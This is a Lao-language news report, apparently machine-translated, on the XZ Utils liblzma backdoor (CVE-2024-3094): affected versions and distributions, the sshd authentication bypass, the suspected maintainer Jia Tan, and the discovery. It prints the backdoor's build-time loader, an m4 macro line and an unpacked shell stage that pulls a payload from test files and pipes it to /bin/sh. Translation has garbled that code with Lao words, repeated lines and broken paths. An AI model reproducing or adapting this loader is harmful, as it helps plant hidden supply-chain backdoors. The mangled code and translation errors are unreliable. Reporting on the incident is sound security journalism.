เปเบเบเบธเบ XZ Utils, เปเบเบดเปเบเบเบฐเบเบญเบเบกเบตเบซเปเบญเบเบชเบฐเบซเบกเบธเบ liblzma เปเบฅเบฐเบชเบดเปเบเบญเปเบฒเบเบงเบเบเบงเบฒเบกเบชเบฐเบเบงเบเบชเปเบฒเบฅเบฑเบเบเบฒเบเปเบฎเบฑเบเบงเบฝเบเบเบฑเบเบเปเปเบกเบนเบเบเบตเปเบเบทเบเบเบตเบเบญเบฑเบเปเบเบฎเบนเบเปเบเบ ".xz", backdoor (CVE-2024-3094) เปเบเปเบเบทเบเบฅเบฐเบเบธเบงเปเบฒเบญเบฐเบเบธเบเบฒเบเปเบซเปเบเบฑเบเบเบงเบฒเบเปเบฅเบฐเบเบฑเบเปเบเบเบเปเปเบกเบนเบเบเบตเปเบเบทเบเบเบธเบเปเบเปเบเปเบเบเปเบญเบฑเบเบเบฅเบดเปเบเบเบฑเบเบเบตเปเบเปเบฝเบงเบเปเบญเบ. เบเบฑเบเบซเปเบญเบเบชเบฐเบซเบกเบธเบ liblzma. เปเบเบปเปเบฒเบซเบกเบฒเบเบเบปเปเบเบเปเบเบญเบ backdoor เปเบกเปเบเปเบเบทเปเบญเบเปเบกเปเบเปเบฒเบเบเบญเบ OpenSSH, เปเบเบดเปเบเปเบเบเบฒเบเบเบฒเบเปเบเบเบขเบฒเบเบเบทเบเบกเบฑเบเปเบงเปเบเบฑเบเบซเปเบญเบเบชเบฐเบซเบกเบธเบ libsystemd, เปเบเบดเปเบเปเบเบเบฒเบเบเบฑเบเบเบฑเบเปเบกเปเบเปเบเป liblzma. เบเบฒเบเปเบเบทเปเบญเบกเปเบเบ sshd เบเบฑเบเบซเปเบญเบเบชเบฐเบซเบกเบธเบเบเบตเปเบกเบตเบเบงเบฒเบกเบชเปเบฝเบเปเบฎเบฑเบเปเบซเปเบเบนเปเปเบเบกเบเบตเบชเบฒเบกเบฒเบเปเบเบปเปเบฒเปเบเบดเบเปเบเบทเปเบญเบเปเบกเปเบเปเบฒเบ SSH เปเบเบเบเปเปเบกเบตเบเบฒเบเบเบดเบชเบนเบเบขเบทเบเบขเบฑเบ.
Backdoor เปเบกเปเบเบกเบตเบขเบนเปเปเบเบเบฒเบเบเปเบญเบเบขเปเบฒเบเปเบเบฑเบเบเบฒเบเบเบฒเบ 5.6.0 เปเบฅเบฐ 5.6.1, เบเบฑเบเบเบตเบกเบกเบฒเปเบเบงเบฑเบเบเบต 24 เบเบธเบกเบเบฒเปเบฅเบฐ 9 เบกเบตเบเบฒ, เปเบเบดเปเบเบชเบฒเบกเบฒเบเปเบเบปเปเบฒเปเบเปเบเบเบฒเบเปเบเบเบขเบฒเบเปเบฅเบฐเบเปเบญเบเปเบเบฑเบเบกเปเบฝเบเบเบฒเบเบขเปเบฒเบ, เบเบปเบงเบขเปเบฒเบเปเบเบฑเปเบ Gentoo, Arch Linux, Debian sid / unstable, Fedora Rawhide เปเบฅเบฐ 40-beta, openSUSE factory and tumbleweed, LibreELEC, Alpine edge, Solus, NixOS unstable, OpenIndiana, OpenMandriva rolling, pkgsrc current, Slackware current, Manjaro testing. เบเบนเปโเปเบเปโเบเบฑเบโเบซเบกเบปเบโเบเบญเบ xz 5.6.0 เปเบฅเบฐ 5.6.1 เบเปเบญเบโเปเบกเปเบโเปเบเบฐโเบเปเบฒโเปเบซเปโเปเบฅเบฑเปเบโเบเปเบงเบโเบเบฑเบโเบเบทเบโเปเบโเบเปเบญเบโเปเบงเบตโเบเบฑเบ 5.4.6.
เปเบเบเบฑเบเบเบฒเบเบฑเบเปเบเบซเบผเบธเบเบเปเบญเบเบเบฑเบเบซเบฒ, เบกเบฑเบเบชเบฒเบกเบฒเบเบชเบฑเบเปเบเบเปเบซเบฑเบเปเบเปเบงเปเบฒเบชเบฐเบเบฑเบเบเบญเบ liblzma เบเบตเปเบกเบต backdoor เบเปเปเปเบเปเบเบฑเบเบเบฒเบเปเบซเปเปเบเบฑเบเบชเปเบงเบเบซเบเบถเปเบเบเบญเบเบเบฒเบเบเปเบญเบเบเบตเปเบซเบกเบฑเปเบเบเบปเบเบเบญเบเบเบฒเบเปเบเบเบขเบฒเบเบเบฐเบซเบเบฒเบเปเบซเบเป, เปเบเปเปเบเปเบฎเบฑเบเบเบปเบเบเบฐเบเบปเบ openSUSE Tumbleweed เปเบฅเบฐ Fedora 40-beta. Arch Linux เปเบฅเบฐ Gentoo เปเบเป zx เบฅเบธเปเบเบเบตเปเบกเบตเบเบงเบฒเบกเบชเปเบฝเบ, เปเบเปเบเปเปเบญเปเบญเบเปเบซเบงเบเปเปเบเบฑเบเบเบฒเบเปเบเบกเบเบตเปเบเบฒเบฐเบงเปเบฒเบเบงเบเปเบเบปเบฒเบเปเปเปเบเปเบเปเบฒเปเบเป patch systemd-notify เบเบฑเบ openssh, เปเบเบดเปเบเปเบฎเบฑเบเปเบซเป sshd เปเบเบทเปเบญเบกเปเบเบเบเบฑเบ liblzma. backdoor เบกเบตเบเบปเบเบเบฐเบเบปเบเบเบฝเบเปเบเปเบฅเบฐเบเบปเบ x86_64 เปเบเบเบญเบตเบเปเบชเป Linux kernel เปเบฅเบฐเบซเปเบญเบเบชเบฐเบซเบกเบธเบ Glibc C.
เบฅเบฐเบซเบฑเบเบเบฒเบเปเบเบตเบเปเบเป backdoor เปเบเปเบเบทเบเปเบเบทเปเบญเบเปเบงเปเปเบ m4 macro เบเบฒเบเปเบเบฅเป build-to-host.m4 เบเบตเปเปเบเปเปเบเบเบเบธเบเปเบเบทเปเบญเบเบกเบทเบญเบฑเบเบเบฐเปเบเบกเบฑเบเปเบเปเบงเบฅเบฒเบชเปเบฒเบ. เปเบโเบฅเบฐโเบซเบงเปเบฒเบโเบเบฒเบโเบเบฐโเบเบญเบโ, เปเบโเบฅเบฐโเบซเบงเปเบฒเบโเบเบฒเบโเบเบฐโเบเบดโเบเบฑเบโเบเบญเบโเบเบฒเบโเบเบฐโเบเบดโเบเบฑเบโเบเบฒเบ obfuscated intricate เบญเบตเบโเบเบฒเบกโเบเบฒเบโเปเบเบฑเบโเบฎเบฑเบโเบชเบฒ (bad-3-corrupt_lzma2.xz, good-large_compressed.lzma), เปเบเปโเปเบเบทเปเบญโเบเบปเบโเบชเบญเบโเบเบงเบฒเบกโเบเบทเบโเบเปเบญเบโเบเบญเบโเบเบฒเบโเบเปเบฒโเปเบเบตเบโเบเบฒเบ, เปเบเบฅโเปโเบงเบฑเบโเบเบธโเบเบตเปโเบกเบตโเบฅเบฐโเบซเบฑเบโเบเบตเปโเบฎเปเบฒเบโเปเบฎเบโเปเบเปโเบเบทเบโเบชเปเบฒเบโเบเบถเปเบ, เปเบเบดเปเบโเบฅเบงเบกโเบขเบนเปโเปเบ เบซเปเบชเบฐเบซเบกเบธเบ liblzma เปเบฅเบฐเบเปเบฝเบเปเบซเบเบเบปเบเบเบญเบเบเบฒเบเบเปเบฒเปเบเบตเบเบเบฒเบเบเบฒเบเบซเบเปเบฒเบเบตเปเบเบญเบเบกเบฑเบ. เบกเบฐเบซเบฒเบเบฒเบ m4 เบเบตเปเปเบเบตเบเปเบเป backdoor เปเบกเปเบเบฅเบงเบกเบขเบนเปเปเบ tarballs เบเบฒเบเบเปเบญเบ, เปเบเปเบเปเปเปเบเปเบขเบนเปเปเบเบเปเบญเบเปเบเบฑเบเบกเปเบฝเบ Git. เปเบเบเบฐเบเบฐเบเบฝเบงเบเบฑเบ, เบเบฑเบเปเบเบฑเบเบเปเปเบกเบนเบเบเบฒเบเบเบปเบเบชเบญเบเบเบตเปเปเบเบฑเบเบญเบฑเบเบเบฐเบฅเบฒเบเบกเบตเบขเบนเปเปเบเบเปเบญเบเปเบเบฑเบเบกเปเบฝเบ, i.e. เบเบธเบเบเบปเบเบเบตเปเบเบฐเบเบดเบเบฑเบ backdoor เบกเบตเบเบฒเบเปเบเบปเปเบฒเปเบเบดเบเบเบฑเบ repository เปเบฅเบฐเบเบฐเบเบงเบเบเบฒเบเบเบฐเบฅเบดเบเบเบฒเบเบเปเบญเบ.
เปเบกเบทเปเบญเปเบเป liblzma เปเบเปเบญเบฑเบเบเบฅเบดเปเบเบเบฑเบ, เบเบฒเบเบเปเบฝเบเปเบเบเบเบตเปเปเบเบฑเบเบญเบฑเบเบเบฐเบฅเบฒเบเบชเบฒเบกเบฒเบเบเบทเบเบเปเบฒเปเบเปเปเบเบทเปเบญเบเบฑเบเบเบงเบฒเบเบซเบผเบทเปเบเปเปเบเบเปเปเบกเบนเบ, เบซเบผเบทเบเบปเบเบเบฐเบเบปเบเบเปเปเบเบฒเบเปเบฎเบฑเบเบงเบฝเบเบเบญเบ sshd. เปเบเบเบชเบฐเปเบเบฒเบฐ, เบฅเบฐเบซเบฑเบเบเบตเปเปเบเบฑเบเบญเบฑเบเบเบฐเบฅเบฒเบเปเบเปเบซเบผเบญเบเบฅเบงเบเบเบฑเบเบเบฑเบ RSA_public_decrypt เปเบเบทเปเบญเบเปเบฒเบกเบเบฑเปเบเบเบญเบเบเบฒเบเบเบงเบเบชเบญเบ sshd. Backdoor เบฅเบงเบกเปเบเบดเบเบเบฒเบเบเบปเบเบเปเบญเบเบเบฒเบเบเบฒเบเบเบงเบเบชเบญเบ เปเบฅเบฐเบเปเปเปเบเปเบชเบฐเปเบเบเบเบปเบงเบกเบฑเบเปเบญเบเปเบกเบทเปเบญเบเบปเบงเปเบเบชเบฐเบเบฒเบเปเบงเบเบฅเปเบญเบก LANG เปเบฅเบฐ TERM เปเบเปเบเบทเบเบเบฑเปเบ (i.e., เปเบกเบทเปเบญเปเบฅเปเบเบเบฐเบเบงเบเบเบฒเบเบขเบนเปเปเบ terminal) เปเบฅเบฐเบเบปเบงเปเบเบชเบฐเบเบฒเบเปเบงเบเบฅเปเบญเบก LD_DEBUG เปเบฅเบฐ LD_PROFILE เบเปเปเปเบเปเบเบทเบเบเบฑเปเบ, เปเบฅเบฐเบเบฑเบเบเบทเบเปเบเบตเบเปเบเปเบเบฝเบเปเบเปเปเบกเบทเปเบญเบเบฐเบเบดเบเบฑเบเบเบฒเบ. /usr/sbin/sshd เปเบเบฅเปเบเบตเปเบชเบฒเบกเบฒเบเบเบฐเบเบดเบเบฑเบเปเบเป . backdoor เบเบฑเบเบกเบตเบงเบดเบเบตเบเบฒเบเบเบงเบเบเบปเบเบเบฒเบเบเบฐเบเบดเบเบฑเบเปเบเบชเบฐเบเบฒเบเปเบงเบเบฅเปเบญเบกเบเบตเบเบฑเบ.
เปเบเบเบชเบฐเปเบเบฒเบฐ, เปเบเบฅเป m4/build-to-host.m4 เปเบเป gl_am_configmake=`grep -aErls โ#{4}[[:alnum:]]{5}#{4}$โ $srcdir/ 2>/dev / null` โฆ gl_[$1]_config='sed \ยปr\n\ยป $gl_am_configmake | eval $gl_path_map | $gl_[$1]_prefix -d 2>/dev/null'
เปเบเบเบฒเบเบเปเปเบชเปเบฒเบเบเบฑเปเบเบเปเบฒเบญเบดเบ, เบเบฒเบเบเปเบฒเปเบเบตเบเบเบฒเบ grep เปเบเปเบเบปเบเปเบซเบฑเบเปเบเบฅเป tests/files/bad-3-corrupt_lzma2.xz, เปเบเบดเปเบ, เปเบกเบทเปเบญ unpacked, เบชเปเบฒเบ script: ####Hello#### #345U211267$^D330^W [ ! $(uname) = "Linux" ] && เบญเบญเบ 0 [ ! $(uname) = "Linux" ] && เบญเบญเบ 0 [ ! $(uname) = "Linux" ] && เบญเบญเบ 0 [ ! $(uname) = "Linux" ] && เบญเบญเบ 0 [ ! $(uname) = "Linux" ] && exit 0 eval `grep ^srcdir= config.status` เบเปเบฒเบเบปเบเบชเบญเบ -f ../../config.status;เบซเบผเบฑเบเบเบฒเบเบเบฑเปเบ eval `grep ^srcdir= ../../config .status` srcdir="../../$srcdirยป fi export i=ยป((head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/ null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head - c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head - c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/ dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && ( head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +939)";(xz -dc $srcdir/tests/files/good-large_compressed.lzma|eval $i|tail -c +31233|tr "\114-\321\322-\377\35-\47\14-\34\0-\13 \50-\113" "\0-\377")|xz -F raw โlzma1 -dc|/bin/sh ####เปเบฅเบ####
เบงเบดเบเบตเบเบตเปเบเบนเปเปเบเบกเบเบตเบเบฑเบเบเบฒเบเปเบเบทเปเบญเปเบเบปเปเบฒเปเบเบดเบเปเบเบเบชเปเบฒเบเบเบทเปเบเบเบฒเบเบเบญเบเปเบเบเบเบฒเบ xz เบเบฑเบเบเปเปเบเบฑเบเบกเบตเบเบงเบฒเบกเบเบฑเบเปเบเบเบขเปเบฒเบเปเบเบฑเบกเบเบตเป. เบกเบฑเบเบเบฑเบเบเปเปเปเบเบฑเบเบเบตเปเบเบฐเปเบเปเบเปเบเบทเปเบญเบงเปเบฒเบกเบตเบเบนเปเปเบเป เปเบฅเบฐเปเบเบเบเบฒเบเบเปเบฒเบเบงเบเปเบเบปเปเบฒเปเบเบเบตเปเบเบทเบเบเบธเบเบฅเบธเบเปเบเบฑเบเบเบปเบเบกเบฒเบเบฒเบ backdoor. เบเบนเปเบเบฝเบเบเบตเปเบเบทเบเบเปเบฒเบงเบซเบฒเบเบญเบ backdoor (JiaT75 - Jia Tan), เบเบนเปเบเบตเปเบเบฝเบเปเบเปเบกเบเบตเปเบกเบตเบฅเบฐเบซเบฑเบเบเบตเปเปเบเบฑเบเบญเบฑเบเบเบฐเบฅเบฒเบเบขเบนเปเปเบเบเปเบญเบเปเบเบฑเบเบกเปเบฝเบ, เปเบเปเบเบปเบงเบเบฑเบเบเบฑเบเบเบนเปเบเบฑเบเบเบฐเบเบฒ Fedora เปเบฅเบฐเบชเบปเปเบเบเปเบฒเบฎเปเบญเบเบเปเบเบถเบเปเบเบซเบฒ Debian เบเบตเปเบเปเบฝเบงเบเปเบญเบเบเบฑเบเบเบฒเบเบซเบฑเบเบเปเบฝเบเบเบฒเบเปเบเบเบขเบฒเบเปเบเบซเบฒเบชเบฒเบเบฒ xz 5.6.0, เปเบฅเบฐเบเปเปเปเบเป เบเบฐเบเบธเปเบเบเบงเบฒเบกเบชเบปเบเปเบช, เบเบฑเบเบเบฑเปเบเปเบเปเบฅเบฒเบงเปเบเปเปเบเบปเปเบฒเบฎเปเบงเบกเปเบ xz เปเบเปเบเบฑเบเบเบฐเบเบฒเปเบเบชเบญเบเบเบตเบเบตเปเบเปเบฒเบเบกเบฒเปเบฅเบฐเปเบเบฑเบเบเบนเปเบเบฑเบเบเบฐเบเบฒเบเบตเบชเบญเบเปเบเปเบเปเบเบญเบเบเปเบฒเบเบงเบเบเบฒเบเบเปเบฝเบเปเบเบ. เบเบญเบเปเบซเบเบทเบญเปเบเบเบฒเบเปเบเบเบเบฒเบ xz, เบเบนเปเบเบฝเบเบเบตเปเบเบทเบเบเปเบฒเบงเบซเบฒเบเบญเบ backdoor เบเบฑเบเปเบเปเปเบเบปเปเบฒเบฎเปเบงเบกเปเบเบเบฒเบเบเบฑเบเบเบฐเบเบฒเบเบธเบ xz-java เปเบฅเบฐ xz-embedded. เบเบดเปเบเปเบเบเบงเปเบฒเบเบฑเปเบ, Jia Tan เบชเบญเบเบชเบฒเบกเบกเบทเปเบเปเบญเบเบซเบเปเบฒเบเบตเปเปเบเปเบเบทเบเบฅเบงเบกเปเบเบปเปเบฒเปเบเบเปเบฒเบเบงเบเบเบนเปเบฎเบฑเบเบชเบฒเปเบเบเบเบฒเบ XZ Embedded เบเบตเปเปเบเปเปเบ Linux kernel.
เบเบฒเบเบเปเบฝเบเปเบเบเบเบตเปเปเบเบฑเบเบญเบฑเบเบเบฐเบฅเบฒเบเปเบเปเบเบทเบเบเบปเปเบเบเบปเบเบซเบผเบฑเบเบเบฒเบเบเบฒเบเบงเบดเปเบเบฒเบฐเบเบฒเบเบเปเบฅเบดเปเบเบ CPU เบซเบผเบฒเบเปเบเบตเบเปเบเปเบฅเบฐเบเบงเบฒเบกเบเบดเบเบเบฒเบเบเบตเปเบชเปเบฒเบเบเบถเปเบเปเบเบ valgrind เปเบกเบทเปเบญเปเบเบทเปเบญเบกเบเปเปเบเปเบฒเบ ssh เบเบฑเบเบฅเบฐเบเบปเบ Debian sid-based. เปเบเบฑเบเบเบตเปเบชเบฑเบเปเบเบเบงเปเบฒเบเบฒเบเบเปเบญเบ xz 5.6.1 เบฅเบงเบกเบกเบตเบเบฒเบเบเปเบฝเบเปเบเบเบเบตเปเบเบฐเบเบฝเบกเปเบเบเบเบนเปเบเบฝเบเบเบตเปเบเบทเบเบเปเบฒเบงเบซเบฒเบเบญเบ backdoor เปเบเบเบฒเบเบเบญเบเบชเบฐเบซเบเบญเบเบเปเปเบเบฒเบเบฎเปเบญเบเบเบธเบเบเปเบฝเบงเบเบฑเบเบเบฒเบเบเปเบฒเบฅเบปเบเบเบญเบ sshd เปเบฅเบฐเบญเบธเบเบฐเบเบดเปเบซเบเบเบตเปเปเบเบตเบเบเบถเปเบเบซเบผเบฑเบเบเบฒเบเบเบฒเบเบญเบฑเบเปเบเบฃเบเปเบเบฑเบเปเบงเบตเบเบฑเบ zx 5.6.0 เบเบฑเบ backdoor. เบเบญเบเบเบฒเบเบเบฑเปเบ, เปเบเบเบตเบเบฒเบเบเบตเป Jia Tan เปเบเปเปเบฎเบฑเบเบเบฒเบเบเปเบฝเบเปเบเบเบเบตเปเบเปเปเปเบเบปเปเบฒเบเบฑเบเบเบฑเบเบฎเบนเบเปเบเบเบเบฒเบเบเบงเบเบเบฒ "-fsanitize=address", เปเบเบดเปเบเปเบฎเบฑเบเปเบซเปเบกเบฑเบเบเบทเบเบเบดเบเปเบเปเบเบฒเบเปเบเบฅเบฐเบซเบงเปเบฒเบเบเบฒเบเบเบปเบเบชเบญเบ fuzz.
เปเบซเบผเปเบเบเปเปเบกเบนเบ: opennet.ru